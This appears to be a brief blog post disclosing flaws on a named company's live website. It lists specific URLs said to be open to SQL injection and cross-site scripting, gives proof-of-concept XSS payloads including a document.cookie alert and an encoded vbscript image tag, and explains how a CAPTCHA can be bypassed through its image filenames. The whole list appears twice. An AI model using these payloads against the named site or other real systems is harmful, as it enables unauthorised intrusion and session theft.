Sql Injection
www.pigrecotechnology.it/Archivio/goRicerca.asp?tipologia=tesi
Sql injection and XSS
http://www.pigrecotechnology.it/Search/contRicerca.asp
in the search form
"><script>alert(document.cookie);</script><"
XSS
http://www.pigrecotechnology.it/riservata.asp?messaggio=%3CIMG%20SRC=%27vbscript:msgbox%28%22hello%22%29%27%3E
useless CAPTCHA
http://www.pigrecotechnology.it/riservata.asp
You can get the captcha code (numbers) from the name of the images. It can be easily avoided by a very simple bot. It's just useless.
www.pigrecotechnology.it/Archivio/goRicerca.asp?tipologia=tesi
Sql injection and XSS
http://www.pigrecotechnology.it/Search/contRicerca.asp
in the search form
"><script>alert(document.cookie);</script><"
XSS
http://www.pigrecotechnology.it/riservata.asp?messaggio=%3CIMG%20SRC=%27vbscript:msgbox%28%22hello%22%29%27%3E
useless CAPTCHA
http://www.pigrecotechnology.it/riservata.asp
You can get the captcha code (numbers) from the name of the images. It can be easily avoided by a very simple bot. It's just useless.
Comments
Post a Comment